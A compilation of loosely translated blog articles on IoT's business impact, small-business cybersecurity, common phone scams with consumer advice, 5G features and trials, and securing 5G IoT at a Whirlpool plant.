5 Ways the IoT Can Change the Business World

5 Ways the IoT Can Change the Business World

Internet of Things has started transforming businesses in 2020

The use of cutting edge technologies like AI,IoT and 5G in the business world is no more different.IoT devices going to work in close connection framework to each other and will be controlled to improve efficiency, which in turn has direct impact on the productivity of the business. More work can be done in less time.IoT devices record and transfer data to monitor important processes, give us new insights, boost efficiency, and allow companies to make more informed decisions.The increment in productivity and efficiency will increase your profits significantly.

Here are possibilities of the near future Internet of Things (IoT). This information is based on a survey of 3000 executives in 12 countries and on the company’s own IoT expertise, as well as feedback from customers and partners.

– The Internet of Things has gone from being a buzzword to becoming a part of everyday life any future-oriented business must relate to. It’s too late to ask if IoT, or the Internet of Things, has value. In 2019, the question must be how we can make the most of it. This is exactly why we enlisted the IOT 2020 business impact.

This is what the energy specialist believes are the five most important possibilities of the future IoT:

5 Ways Today’s IoT Will Affect Your Business

1.Mobile Employees

With tomorrow’s IoT, we get a new digital wave that just connects things (Things) using the Internet. This makes us more mobile and more digital than ever. The digital wave is accelerating interconnected sensors at lower prices, artificial intelligence devices, faster networks, cloud services and increased capacity for advanced data analysis. With the new wave, the farmer does not have to be in the barn to check if the cow is satisfied.

2.Customer Satisfaction and Loyalty

IoT enables us to take advantage of unused data sources to enhance the customer experience. Although many companies are thinking about efficiency and lower costs when considering the value of IoT, access to huge amounts of data and the ability to retrieve real-time information is perhaps most important. IoT can provide even better customer service and new opportunities for customer satisfaction and loyalty. Who would not like a customer center that has the solution ready the moment we get through the telephone queue?

3. Combines Security and Flexibility

An open, compatible and hybrid way of working is the basis for tomorrow’s IoT. It requires collaboration on global cyber security standards. In addition, cloud-based IoT will grow, both in popularity and in diversity, across systems. When IoT solutions become available to most people, the solutions will be tailored to both security needs and tasks to be solved. With a little luck we can adapt the safety to the job and not the other way around.

4. New Sources of Revenue and New Business Models

Just as innovation and development have been driven by the industrial revolution, the mobile phone and the internet, IoT will lead to new ways of making money and new business models. Schneider Electric’s Energy Operations software and Building Analytics are two good examples of IoT used in property management. Thanks to grid-connected sensors combined with analysis software and assistance from the company’s energy advisers, operators can now be immediately notified of system failures and intervene immediately before causing downtime or energy loss. The data stream from the plants is aggregated into monthly reports that point out specific efficiency measures. The system has been used by NTNU, among others, at Campus Gløshaugen in Trondheim with excellent results.

Companies, cities and especially developing countries will benefit from IoT solutions, as these solutions are freer and do not have to comply with traditional laws and regulations. According to the consulting firm McKinsey, today’s developing countries account for as much as 40 percent of the market for IoT solutions.

5. Helps the Environment

IoT solutions help to address some of our greatest challenges, namely global warming and pollution. In fact, Schneider Electric’s report shows that expectations for IoT are highest when it comes to the effect on climate and the environment. Both public and private sectors are using IoT solutions in the fight against global warming. For example, the University Hospital in Northern Norway has automated Europe’s largest patient hotel and delivers world-class energy efficiency. Read more about it here .

Still unused potential

Even now in 2019, IoT is delivering great value results. Still, according to the energy company, there is great potential for more. According to Schneider Electric, IoT solutions are the most useful in these four areas:

1. Maximize energy efficiency and sustainability through smarter systems and faster decision making. Gigantic Excel sheets are now being replaced by real-time mobile control.

2. Optimized machine and system use as a result of good monitoring and analysis. For example, with critical material and temperature measurement sensors, you can find weaknesses and avoid downtime.

3. Smart, productive and profitable operation through cuts in use of time and resources. Real-time analytics allow you to customize your operations or production as needed from time to time.

4. Mobile monitoring and reduced risk due to simulation and digitalisation. With today’s IoT solutions, you can check the factory’s machinery on the cellphone on the couch and be on the alert when the accident happens.

What risks do IoT security issues pose to businesses ?

The threats of the future will be more targeted and that new technology will make it easier.
Must increase focus on IT security among SMEs

As the security of large companies has improved, the attacks will increasingly come against smaller companies. It is not only useful to secure the big ones – everyone must be safer, if the country is to become safer, Dficlub concludes.

More targeted attacks

We believes the threats of the future will be more targeted and that new technology will make it easier to attack smaller companies.

Everyone is finding the starting point for the digital transformation and the road to mature production in the IoT age. Terms like Smart Manufacturing, Industry 4.0, Digital Transformation and Industrial Internet of Things (IIoT) are no more getting more practical and applications based: We are bombarded by new concepts and hyper that remind us daily of the rapidly changing world of manufacturers.

Everyone can find an excuse to ignore them, but you can be sure this is not a hype. The world is changing faster than ever, and manufacturers can’t afford to be left behind.

Research based firms has studied the industrial software market for several years, and researchers interviewed hundreds of industrial players. There is a common theme that goes back; – To get started, one must find the starting point for the digital transformation. Results shows how production management systems (MOMs) can be a low-risk and effective starting point for companies that see production as a key part of the digital transformation.

MOM; The concept shows how production and operations management can use business organization and management concepts in the production of goods and services. But a big challenge that IoT based industries are going to face is security.

– If you look at blackmail via email, this is a sign that the attacks are being targeted. The attacks are based on the company’s internal resources and can, for example, attach previously used usernames and passwords to make the attack feel more personal.

Bjarte Malmedal was in the first person that received a master’s degree in information security at the Gjøvik University College. After his studies, he worked for over 20 years with security management and operational cyber security in the Armed Forces, and was instrumental in establishing and leading the defense cybersecurity center. The environment was one of the first to work systematically with operational information security in Norway, says Malmedal, who currently works as chief consultant for Experis Cybersecurity.

Security culture and the human factor

– It was a major cultural shift to move from the defense’s operational and technical security efforts to focus on the human factor. The project at NorSIS was to provide a systematic overview of what has been done in the field of security culture in Norway, and was one of the first of its kind in the world. It was therefore a highlight to present the report to the International Telecommunications Union (ITU), a UN body for global standardization in telecommunications, he says.

Malmedal was also responsible for reports on safety culture in the energy and water supply sectors, as well as for the youth segment. The project has now collected data for over four years and provides the basis for analyzing trends and changes over time.

Must secure the entire value chain

He says that many are concerned about security culture, but lack a clear picture of what it actually means.

– In case of data breaches, companies often blame poor security culture, but when you ask what it actually is, they get an answer. One must therefore break the term down to attitudes, knowledge, or behavior. The report is a guide to identify how the situation is in your own organization.

As editor of the government’s new national IT security strategy, which was presented in January, he looked at how the situation is in business, and especially for small and medium-sized businesses.

– Previously, SMEs were not considered important in terms of security. The idea was that something much worse is happening with, for example, Hydro, but the development of the digital economy has led the major players to depend on the security of the subcontractors. If you look at the latest major security incidents, the attacks often come via subcontractors, and today it is understood that the security of the major players is entirely dependent on the security of the small players, he says.

Must lift the small businesses

He points to a comprehensive lack of IT security expertise among small and medium-sized businesses.

– Smaller companies do not have the money to hire their own people to work with security, but must focus on the core business. If a small business goes to the major security players, they are often offered comprehensive and costly solutions. It is difficult for small businesses to find good security solutions, and we therefore want to help small businesses reach a reasonable level of security.

He refers to a survey conducted by Experis this fall, in which 300 business executives in SMEs were asked about IT security.

– Nine out of ten business executives consider IT security an important one, but only half responded that they had sufficient expertise internally. The general attitude is that IT security is important, but the ability to do something about it is not present.

This is How Phone Phishing Scams Try To Fool You

This is How Phone Phishing Scams Try To Fool You

Mobile and Internet Security How to Defend Against Attackers

Telephone fraud is definitely not a new phenomenon, but the methods are becoming increasingly sophisticated. We have talked to an expert on how to avoid being fooled.

Mobile operators have their own large security environment that blocks hundreds of thousands of scams every year. As per security advisers and investigators of those firms.

– There is definitely no lack of ingenuity in the fraud industry. In order for the scam business to be profitable over time, they still have to adapt their methods. The attacks are continuously adjusted to the level of knowledge of the potential victims, while the scammers try to circumvent the technical security measures of the telecommunications operators.

The latter is far more difficult than manipulating people, so scam success is largely about how attentive we are when the scammer tries.

It may therefore be wise to know how the scammers operate.

The three most common scams – right now:

1. Local numbers enter into confidence

While we have gradually become more vigilant when calling from unknown, foreign numbers, the threshold is significantly lower when it comes to numbers starting with local country code.

During the summer, the security department of mobile companies registered that fraudsters have begun to imitate local numbers, with both nine and ten digits according to the country code.

In a busy day, you may not notice how many digits there are in the number. It starts with normal mobile number, so it’s safe to answer…

They receive daily inquiries from customers who report suspicious experiences with phone calls, text messages and emails from people pretending to be someone else. This is called “spoofing”.

– The scammers have started to abuse and spoof specific country phone numbers to a greater extent when they contact that country residents, both real and constructed numbers.

If your number gets spoofed, it is important to know that neither your mobile nor your number has been hacked. The scammers use software that allows them to pretend to call from a number that is not theirs. It also makes it very difficult to reveal the fraud to the person being contacted – before responding.

– It costs nothing to answer, but the potential for loss lies in what happens afterwards. Then the scammers will gladly try to clear you of personal information and card details.

Expert’s advice:

If you find that someone has misused your number – contact your mobile provider so they can often help you. by blocking foreign calls from your number. But it also means that you cannot call from abroad to your country, e.g. when on vacation. The vast majority of smartphones can also block numbers that are bothersome or unwanted. If you do not recognize the local number that is calling you – spend a few seconds looking at the number of digits before answering.

2. “Microsoft Scams”

This is a classic example of “phishing”, where the scammer “fishes” your personal information. By accessing your PC, the scammer tries to get you to download malware, pay for viruses you don’t need – and get both card numbers and login details for, for example, online banking.

Mobile operators daily prevent and handle fraud attempts.

Here are tips:

– If you experience or suspect fraud attempts via calls or SMS, you can notify your mobile operator.They have the opportunity to block unwanted international calls before being forwarded to specific mobile subscriptions.

Expert’s advice:

Neither Microsoft nor any other operating system vendor will contact you to request software downloads or provide sensitive information in this way. Therefore, in order to reveal this fraudulent method, it is important that as many people as possible know how it works. Knowledge is the most effective defense!

3. Interrupted calls pique curiosity

Have you ever been called from an unknown foreign phone number that only lets it ring once or twice before it goes silent? Then you may have been exposed to a scam called “wangiri”. It is Japanese and means that the call ends after just a ringtone.

The point is that you should not be able to answer, but be sufficiently curious to call back. It is only when you call back that the scam starts – the number you call back is an international high-tariff number with a high minute price.

As many as 10% who receive a “wangiri” call actually call back the missed call, so this is a very simple and profitable form of fraud.

– The international scammer uses a so-called call generator to call several thousand daily subscribers at once. Remember that the taximeter starts even if you do not hear someone answer at the other end, and it can be expensive in some cases, warns by security expert.

Expert’s advice:

Be aware of which numbers you call back. If you do not recognize the number, or do not expect to receive a call from the country in question, you should not call back – no matter how curious you are.

You can’t stop all the threats yourself
The difference between scams and other types of digital threats is that you can often prevent the scams yourself, while you need help to stop or limit everything else that can happen.

Therefore mobile operators offers a number of security services that make the digital life safer. One of these is Secure ID, a fraud prevention service that helps you in the event of ID theft. You will be notified immediately on your mobile if your personal data is being misplaced and will be assisted in case of any abuse.

A safer everyday life with Secure ID:

Have you ever worried about your personal data being abused or disseminated by others? If you have a Safe ID, you will receive notifications as soon as we find your personal information in error, and you will be assisted by abuse.

Secure ID means extra security for you – and the family!

How does Secure ID work?
Secure ID consists of three elements: ID monitoring, ID theft insurance and Internet erasure. Note that ID theft insurance starts automatically when ordering, while ID monitoring must be activated by registering at least one e-mail address. To make use of Web Delete, you must first create a case.

ID monitoring
The first step in reducing the risk of ID theft is ID monitoring. Most people use their email addresses as usernames on multiple websites. With ID monitoring, you are notified if secure ID system find your email address and login details in an unsafe place on the web. To be notified, you must first register which email addresses to monitor.

You can register up to 5 email addresses
The email addresses are registered and must be verified via email
When the emails are registered you will be notified if the email (often username / password) is for sale or misused online

ID theft insurance
Assures you help if you have been exposed to ID theft, so you get legal assistance and financial compensation for abuse and fraud. You also get help if someone has created a false profile with your information.

The ID theft insurance covers yourself, spouse / cohabitant and all children under the age of 20 living at the same address.

With Online Delete, you get help removing unwanted content online. This applies to both things that are written about you and private images in the balance. You get legal assistance and a contact person who takes on the job of deleting photos and comments for you. You will also receive financial compensation if you need psychologist assistance and loss of salary income.

How to prevent data from spreading online

By using ID monitoring and responding to any alerts you receive, you can quickly respond and reduce the risk of someone misusing your data if it is spread on the Internet.
You are probably registered with several services on the internet, where you use your email address to log in. There may be security breaches in these services that cause your information to be disseminated online. If the ID monitoring finds security breaches, this may mean that your information is being misused by unauthorized persons.

Useful tips and advice – some simple precautions to follow online

  • Use different passwords on different services and change passwords frequently
  • Never share your personal data
  • Never email bank / credit card details
  • Never shop at online stores that do not have secure payment
  • Lock your mailbox if possible
  • Do not click links in emails from unknown senders, enter the address yourself in browser
  • Keep track of transactions in your bank account
  • Delete content on your mobile, PC or Mac before discarding or delivering it
  • Be careful
5 Reasons Why 5G is The Future

5 Reasons Why 5G is The Future

5 Reasons to Look Forward to 5G

The next generation mobile network is more than “just” crazy speeds …

We are approaching a society where everything and everyone is connected through the internet – at tremendous speeds, thanks to the 5G network.

Many mobile operators recently opened 5G pilots in limited areas , and are thus well on track before next year’s large-scale rollout of the super network of the future.

And there are several reasons to rejoice. Here are five of them …

1. Huge speeds
That being said, first of all: 5G will offer incredible speeds.

– Year after year, data usage is growing by between 50 and 100 percent. 5G will enable much more data to be transported than today’s 4G network, and is therefore far more mature to cope with our increasingly advanced data usage.

According to recent 5G test results , we will notice this especially when streaming or using entertainment services:

– Playing on 5G will go like a dream, with speeds at the level of fiber.

The fact that there is hardly any latency to talk about in the 5G network is also something that will delight many online players.

2. Ski-sharing networks
Networked slices are different networks built on top of the underlying mobile network. In practice, this will mean that, for example, health services, industrial areas and zones for autonomous vehicles will each have their own customized network – but on the same mobile network.

– 5G will be so good that companies can have their own data connection configurations tailored to the individual business. The mobile network no longer becomes “one size fits all”.

3. Guaranteed quality of service
With 5G, it is possible to offer guaranteed service quality, or Quality of Service (QoS).

For example, many players, including Telenor, are working to facilitate self-driving, autonomous vehicles. When these roll out on Norwegian roads, it is crucial that they always have a secure, stable and fast connection through the mobile network.

– Imagine a surgeon performing a remote operation using a robot. It will require extremely fast response time from the network, but with 5G this will be possible.

In short, the time it takes for large amounts of data to be sent back and forth in the 5G network will be close to zero, which opens up an enormous number of opportunities that depend on real-time data – something that is not possible today over the 4G network .

4. “IoT” – everything is connected to everything
You may have heard the term before? The Internet of Things, or the Internet of Industry Things, has been talked about for a while now. It is simple to imagine that billions of devices, sensors, machines and things are connected to the Internet at any given time.

Admittedly, this is also being rolled out in today’s 4G network, but the 5G network will have the capacity to handle even more devices.

– Every Sunday when I cook in the oven, I think how nice it would be to be able to sit on the sofa and control the temperature in the oven and have a complete overview of the cooking.

With the 5G network we will see that more and more things are connected to the network, which can give us a more efficient and comfortable everyday life.

5. Full use of VR and AR

Because of the huge amount of data virtual reality equipment requires, many believe that 5G will be able to bring out the full potential of the technology – as data can be sent back and forth between the screens and a real-time server. The same applies to so-called augmented reality (shortened to “AR”).

VR includes technology that closes the outside world and lets you unfold in an artificial reality. With AR you can add digital elements to the reality we actually live.

The popular game Pokémon Go is perhaps the best known example of AR technology. As the technology advances, for example, you can get traffic info in a corner of the windshield as you drive home from work, and you and the pod can build complicated Minecraft structures in the park using their own set of AR glasses.

– Many people have the belief that glasses that can do different things will become a reality.

You must know these 5G terminologies:

Network Slicing: The mobile network can be divided into separate networks that work independently of one another

QoS: “Quality of Service”, security against outages, errors and delays

IoT: “Internet of Things”, billions of devices are connected to the web

VR: “Virtual Reality”, technology that encloses the user in an artificial reality

AR: Augmented Reality — augmented reality, adds digital elements to the real world

IoMT:”Internet of Medical Things”, billions of medical related devices are connected to the web

IoIT:”Internet of Industrial Things”, billions of industry devices are connected to the web

why 5g is the future
Evolution of 5G in Internet of Medical Things (IoMT)

Evolution of 5G in Internet of Medical Things (IoMT)

Role of 5G in Medical Health: First Test Case

Norway’s first private individual, who works in the Emergency Medical Center (AMK) Inland, to connect to a 5G mobile network. He knows that good coverage can mean life or death.This is Europe’s first use case of 5g applications in healthcare.

He has truly experienced the importance of a functioning 5G mobile network.He has tried everything a mobile can do and clearly notices the difference from LTE mobile network.

“I notice that there is better sound and much faster network. Whether I’m streaming movies or sending video clips.”

As per him every day we notice how important it is to have a proper network, when there are people who need help and need to notify.With a functioning 5G network you can send ECG measurements of patients to HQ hospitals faster, you can film car wrecks to get an impression of the extent of damage after a traffic accident.
And it can be easier to find people who have lost their way in the mountains, he said.

This is just a start of evolution of 5G in internet of medical things (IoMT).

This is 5G

The hyper-connected community of revolutionary technology on 5G is soon a reality. It means a huge number of things connected to the web, high speeds, minimal delays, increased reliability and brand new possibilities for using the web.

What is 5G?

We have been developing mobile networks with new generations about every ten years since analogue NMT (1G) came in 1981, 2G in 1992, 3G in 2001 and 4G in 2010. Around 2020 comes 5G.

5G will provide us with two main types of communication solutions: The first provides us with a higher capacity mobile broadband network and enhanced user experiences. The second major type provides a 5G network that will enable special networking solutions for many different purposes with different functionality requirements. It will be designed for billions of things connected to the web, for very fast response times, and for increased security and reliability.

The big difference between the 5G network and previous generations is that 5G is designed to provide networks and services to various industrial and community-driven equipment units, as well as services and networks for the smartphone.

How would you like to experience 5G?

In addition to mobile broadband, 5G will be offered as fixed broadband access to households and businesses in areas without fiber networks. It will also be arranged for broadcasting of radio and TV. The emergency services will have their own safe and effective solutions for emergency situations, including for coordination of communication with audio, video, maps, positioning, first aid, drone management etc. Companies, government agencies and households will be able to create their own “private” networks of sensors and machines that can be controlled and controlled via the network. Vehicles will be connected and combined for safer and more efficient traffic management. In the health sector, 5G could be used for telemedicine to diagnose and treat patients where they are. In the energy sector, 5G can be used to measure and control production, distribution and consumption in more environmentally friendly and cost-effective ways. In the food industry, 5G will enable more efficient and environmentally friendly production and distribution with the use of sensors that monitor and quality assure the entire food chain from sea, field and barge to the dinner table.

5G is expected to be a driver in the digital transformation of the ICT community of the future, for example, with sensor and communication solutions for smart cities, autonomous transport solutions and emergency networks. Individuals will experience new and improved digital services on their smartphone delivered over 5G. These services will be much faster, more accessible and more secure than today’s services. Individuals will also benefit from sensor and communication solutions for smart cities, autonomous transport solutions and emergency networks. Other 5G services will utilize the available speed and enhanced security for the transmission of virtual or customized reality, such as to “ambulance hospitals” or “firefighter support systems”.

When will 5G be available?

From the start, 5G will be gradually built on top of the 4G network. 5G technology is standardized in two phases, in 2018 and 2019 with international approval in 2020/21, but it is difficult to determine when 5G becomes widely available.

5G is under development and piloted in Europe, Asia and the USA starts with pilots for testing among other things. self-driving buses in 2018. During the Olympics in South Korea it was tested, among other things. 360-degree TV services and 5G-based robots. Commercial development is expected to start in 2020 as needed, but it will not be a massive rollout as we have seen for 3G and 4G. In the coming years, international research and innovation within 5G will focus on the evaluation of 5G.

The KPIs (“key performance indicators”) and piloting of solutions for different applications in different industries.

What is unique about 5G?

5G will come with a host of new and unique features, compared to the 4G network we have become. Three important examples of areas that will benefit from 5G, so-called industrial verticals, are autonomous transport solutions, the energy sector and the media industry. One conceivable transport solution may be the interconnection of cars (“platooning”) with communication between the cars and from the cars to the network which require extremely low delay and strong robustness. This will allow cars and traffic signals to be synchronized for optimum driving speed and density of cars in all conditions.

For the energy sector, however, a massive IoT system with large amounts of sensors that constantly provide new information and data for monitoring, control and big data analysis can be critical.

In the media world, consumers may want to have access to a 5G network at extreme speeds, enabling high quality streaming in real time, preferably with an AR experience as well.

In particular, five features of 5G offer great potential for new applications, helping to propel the hyper-connected community and enable much of the revolutionary technology we hear about otherwise:

Ski-divided network

5G enables operation of a more flexible and programmable network. This is possible through the use of new technology for logical or network slices. Various logical networks will be created on top of this extremely flexible infrastructure, and will deliver as different networking infrastructure as the application requires. In practice, this means that it will be experienced as services with very different needs, such as health services, industrial areas and zones for autonomous vehicles, each having their own network, within the same network – tailored to their needs, and without the expense of each other.

Robustness and Quality

Guarantees This disc sharing also offers guaranteed quality of service (QoS) for various industries, services and uses – which is especially important for critical functions (such as health and emergency services, transport and industrial production), and also makes it safer to become more digital. It ensures a robustness in the network, which enables zero-tolerance services for failures, errors and delays, to use Internet-based services and systems in a whole new way.

Extremely low delays

5G will offer much lower delays in the network than before, some estimate down to 1 ms. In a 4G network, the delay is about 25 ms. As mentioned above, this will be especially important for self-driving cars – which can then communicate for both safer and more efficient transport, when a car knows that the car in front brakes in what it does, it is both secured against a potential collision and can Avoid queuing during synchronized movements. In health, too, low delays can be considered essential, for example with the use of remote-controlled robotic surgery – which you do not want to have any delays, but have near perfect response time from machine and patient in one hospital, to the doctor who controls the operation from a another hospital. 5G offers ultra reliability in these delays, uRLLC (ultra Reliable Low Latency Communication),

Massive machine type communication (mMTC)

Possibility of massive volumes of things connected to the network 5G technology will also make it possible to have a large number of things connected to the network, known as massive machine type communication (mMTC).
We already see that most people have a smartphone, but the great growth of connections is sensors, machines and things connected to the internet – the so-called Internet of Things (IoT). These things also have very different needs: some will exchange tiny amounts of data and ensure long battery life (like a parking sensor buried in the tarmac), while others, like a self-driving car, have plenty of power, but will transfer large amounts of data to cloud. In order for all the technology that is now expected to be implemented within the broad IoT concept, one must have a network that can handle such massive volumes of things on the same network. It offers 5G, which enables one million connected things on the same network, per square kilometer.

High speeds

The least radically different from 4G to 5G, but noteworthy, is the evolution in the speed of the network we will be able to offer. This is not only necessary to meet the strong growth in data traffic in the web that we already see, where more and more content requires large amounts of data. An example here is whether more and more people should stream 4K quality video. It also means that completely new uses are emerging. For example, far more advanced functions and operations can be done in the “cloud” because data is transmitted quickly in the network and does not need to be stored or processed locally. This allows mobile devices to become more advanced and do more demanding things than we have been used to. The big speeds will also be a driver for faster development in the so-called augmented reality,

Some of these features may also be fully or partially incorporated into the constantly evolving 4G network (so-called 4.5G). This means that they will be available even where no 5G coverage will be available, but you will still rely on 4G. Therefore, there is a constant development of the 4G network as well, which will help drive the digitization of society. 5G will enable entirely new uses for the technologies we already have, and will be needed to make use of the technologies we expect will come. The practical consequence of this is that if we are going to be able to take advantage of all the opportunities that new technology gives us, we rely on a better digital infrastructure than the one we have today. That’s why 5G is about far more than just creating a new network,

From one G to another

We are now approaching the fifth generation of mobile networks. Evenly, it can be said that there has been a change about every ten years. Why? Because each “G” in a sense experiences an expiration date. Not as a food, which you know is going to be bad – but, rather, we see that technology in society is evolving in a way that the network is unable to keep up with serving. For example, 3G opened for mobile data, but was not adapted to the revolution that led to the iPhone’s entry in 2007 for data traffic and applications for mobile phones. It was 4G as a dedicated computer network, which made the smartphones shine. The shifts are not driven by needs alone, but also by what can be offered. Networking technology is constantly improving. Then new standards are needed.

Thus, for a G is not a single technological solution, but a standard consisting of a number of technologies, which describe how good a network should be and how it should be built – among other things.

The dynamics are so simple: We need more and we can offer more. It’s the same thing that drives the race against 5G.

The Technology of The Year 2020 Will Be 5G

The Technology of The Year 2020 Will Be 5G


What 5G technology can do ? What can we do with 5G Technology ? Why do we need 5G Network ?

Well these are the most asked queries we receive from around the world. Let’s see how game changing cutting edge technology, 5G , going to change our life in 2020 onward. 

Even after LTE progress does not stand still: people demand high speed internet access, and thanks to IoT, more and more equipment “wants” to connect to the global network. How to solve both problems at once?

From time to time, the media really delights with news of the upcoming 5G era. Clients are bribed by the claimed high speed access. Next Generation Mobile Networking Alliance (NGMN – an association of mobile operators, suppliers, manufacturers and research institutes) defines the following requirements:

  • The data transfer speed is tens of Mbps for tens of thousands of users at the same time.
  • Data transfer rate of 100 Mbps in megacities.
  • The data transfer rate of 1 Gb / s at the same time for many users on the same floor.
  • Connect hundreds of thousands of wireless sensors simultaneously.
  • Higher spectral efficiency compared to 4G.
  • Coverage Improvement.
  • Improving signal transmission efficiency.
  • Significantly lower latency compared to LTE.
  • The frequency spectrum approved by the FCC on July 14, 2016 includes frequencies of 28 GHz, 37 GHz and 39 GHz.

It is worth noting that 5G exists only in the form of the 15th release of specifications and in periodic performance tests, for example, as in Japan.

Japan Tests 5G:
Japanese mobile operator NTT docomo has built a 5G network capable of broadcasting 8K video for VR glasses.

Many of us are just starting to master the 4K image, but technology continues to evolve and 8K resolution will be next for large screens. For reference: the screen in 8K resolution in terms of the number of pixels is equal to four screens in 4K resolution (8192 × 5120, aspect ratio 16:10, 41.9 Megapixels).

The broadcast system allows you to broadcast high-resolution VR content from anywhere using 5G networks. The solution consists of an 8K 3D camera with the ability to record 360 degree video, a Yamaha spherical 3D microphone with 64 audio channels, several data processing servers and a 5G base station. Note that the 3D camera broadcasts 9 videos in 4K at the same time. It is proposed to use Oculus Quest as client equipment.

To achieve this goal, taking into account the requirements for processing video and audio streams, as well as taking into account the bandwidth capabilities, NTT Docomo used a new 8K video encoder with 60FPS to limit the load.

Several real-time data processing servers convert 9 video streams of 4K 3D cameras into 2 streams with 8K resolution in 3D format with a 360-degree panorama. Another server converts 64 sound channels of a 3D microphone into 36 channels of 3D sound. Then all this is compressed and synchronized for streaming over 5G.

Virtual reality technology is only developing. Long development is determined not only by high requirements to the hardware, but also by the massiveness of the devices themselves. In such conditions, it’s difficult to talk about mobility, because no one wants to be “chained” to a PC with wires or constantly be in search of a great Wi-Fi signal.

UK 5G Public Testing
Great news from Vodafone. Manchester Airport launched a public access test using 5G technology. Specially for these purposes, the telecom operator placed a portable Gigacube router (Figure 2) using Massive MIMO technology in the airport terminal. Its characteristic feature is the use of multi-element digital antenna arrays. In simple terms, user terminals will always be much smaller than base station antennas.

Vodafone also uses a 5G Blast Pod . Using Wi-Fi allows visitors to get an idea of ​​5G using existing devices. Users are given free admission to the NOW TV service. As an example, it is proposed to download an episode from the recent Tin stars series in 45 seconds, and the entire series in about 6 minutes. On a 4G network, this would take more than 26 minutes.

Vodafone plans to expand to other major airports and train stations across the UK.

US 5G Prospects and Promises
T-Mobile in their blog declare the fight against Cable monopoly and claim that they will be able to create an alternative to the classic broadband access even in rural areas.

The motivation for this is the FCC report, which says that 28.9% of urban private homes and 61.1% of private homes in rural areas are connected to only one service provider or do not have access to the Internet at all. There is no need to talk about high-speed access. The report details that 45% of private houses in cities and 76% of private houses in rural areas do not have high-speed access or services are provided by only one operator.

According to the business plan, by 2024 T-Mobile is going to connect more than 9.5 million subscribers to the broadband access services using 5G means.

In the near future, the company plans to begin installing 4G wireless routers operating in the LTE T-Mobile network. Under this pilot project, called Home Internet, users get the T-Mobile In Home router for free. The user’s task is simple: unpack the equipment and plug it into the network. In the future, it implies upgrading the router to 2.5 GHz in the frequency spectrum and the ability to work in 5G networks.

What about 5G in Russia?
Russia is also undergoing tests. According to the information , in April 2017, MTS conducted a series of tests at the Otkritie Arena stadium in Moscow. The base station, operating in the range of 14.5-15.3 GHz, transmitted a signal to a moving prototype smartphone at speeds up to 25 Gbit / s. The achieved speed allows you to download an hour-long movie in HD-quality in less than 3 seconds.

Two months later, Megafon together with Huawei updated the speed record, reaching the limit of 35 Gb / s. At their forum booth, the companies showed in action a 5G base station with TDD mode in the frequency range of 70 GHz (E-Band) with a bandwidth of 2 GHz.

After the publication of the bandwidth test results, the Internet community began an active discussion of the 5G competition with the “wired” broadband and Wi-Fi operators. A user will ask: “Why do I need wires when wireless access is several times faster?”

Technical experts from various organizations in their conversations on relevant Internet forums give counter-arguments:

The frequencies used in the air, channel width, the number of clients impose their own restrictions on the operation of wireless base stations, especially in TDD mode.
Radio is a common medium, and it gives no guarantees for speed or performance, unlike fiber optic or copper cable.
Cells of telecom operators also require the creation of radio links for communication with data centers and among themselves.
LTE is already delivering speeds of more than 100 megabits / s, and mass outflow is not observed.
There are not so many routers for LTE distribution. Configuring the “modem + wireless router” bundle is too complicated for most users.

Specialists in the field of radio engineering emphasize that these speed records were achieved at high frequencies of 15 and 70 GHz, while the cellular network operates in the ranges from 453 to 2690 MHz. As a result, modern client mobile devices will not be able to work in 5G networks at the declared speeds. And what about telecom operators? Need to free satellite frequency bands. 

Hardware Replacement
Telecommunications operators will be forced to make large-scale changes in the structure of their networks. To achieve the stated speeds on the cell towers, it will be necessary to replace the base stations and antennas, as well as PPC (equipment of radio bridges between the towers). It is expected that additional masts of cellular communications will be installed.

The most ambitious and costly changes will occur within the network of operators. The usual infrastructure of the mobile operator, shown in Figure 3, will soon become obsolete, and it will be replaced by a new one.

It is understood that the core of the network will require updating of elements such as BRAS , DPI , billing, CG-NAT , DNS and DHCP servers. There are several reasons:

Previously declared access speeds;
introduction of a dual stack of IPv4 and IPv6, once promised support for the Internet of things.
It should be noted that a change in the order of identification is expected. The so-called 5G Subscription Permanent Identifie (according to the concept ) will absorb IMEI and be supplemented with new network identifiers like a MAC address. The old IMEI will be replaced by PEI (Permanent Equipment Identifier) ​​- a permanent equipment identifier.

5G networks and virtual reality technologies open up new possibilities in various types of activities, whether it’s video games, broadcasting concerts and sports programs, medical operations and much more. If for a 5G subscriber these are solid advantages, for telecom operators there are new problems and tasks that can already be started to be solved by replacing the equipment and software of data networks.

IoT Security Threats and How to Handle Them

IoT Security Threats and How to Handle Them

What are the biggest IoT security risks and challenges

High-speed 5G mobile networks not only connect people more efficiently, but also enhance the interconnection and control of machines, objects and devices. High data rates, low latency, and high capacity are good for both consumers and businesses. But as one company that introduced 5G early experiences, these benefits also carry new, significant security risks.

Global home electronics manufacturer Whirlpool has already begun building 5G at one of its plants. The company still uses IoT devices for predictive maintenance, environmental control, and process monitoring over its existing local area Wi-Fi network, but the introduction of 5G will enable autonomous forklifts and other vehicles not possible with Wi-Fi.

“The plant is heavily metal,” said Douglas Barnes, Whirlpool’s North American IT and OT manufacturing infrastructure application manager. WiFi is reflected in the metal. I built a mesh Wi-Fi in the factory, but I can’t help but have too much metal.5G passes through walls and is not reflected by metal. ”

“When 5G is deployed at the plant, Whirlpool will see a breakthrough,” he says. “We will be able to introduce true autonomous vehicles across the facility, covering everything from maintenance and delivery to manufacturing operations.” This business case is significant and can provide significant cost savings. The 5G rewards are great. ”

Vans said the test has already been completed to verify the normal operation of the autonomous vehicle. The budget will be allocated starting this month, and vehicles will be based on 5G by the end of the year. “If the results are good, the autonomous vehicle business case will work everywhere else,” Vans said.

Vans is well aware of the cybersecurity issues already occurring in the enterprise and the extent to which all these issues will amplify as the transition to 5G moves. Whirlpool worked with 5G partner AT & T to address the concerns. “I wrestle with security issues every day.” “Before we started, the first thing we talked with AT & T was how to build a secure network.”

The following are seven key areas that companies such as Whirlpool should consider when developing a 5G implementation plan for IoT.

1. 5G Network Traffic Encryption and Protection.

With 5G, the amount of traffic flowing through these networks increases dramatically with the number of intelligent devices connected to the network. According to Gartner, the number of enterprise and vehicle IoT devices will reach 5.8 billion, up 21 percent next year, from 4.8 billion, the expected number of IoT endpoints this year. For attackers, this means a much richer network of targets than it is today.

According to Vans, Whirlpool will configure the 5G antenna to encrypt all 5G traffic and accept only authorized traffic to address this issue. “When we add a device, we configure it as an acceptable device in 5G,” said Barnes. It does not receive traffic from devices that are not included in the whitelist. In addition, the traffic is encrypted, so don’t worry. “If someone picks up the signal, there is very little that can be done.”

Vans said that when traffic leaves the local network and is sent over public 5G or the Internet, the content is protected via a secure VPN tunnel, “we’ve done this in advance in case we need to communicate with the outside using 5G.”

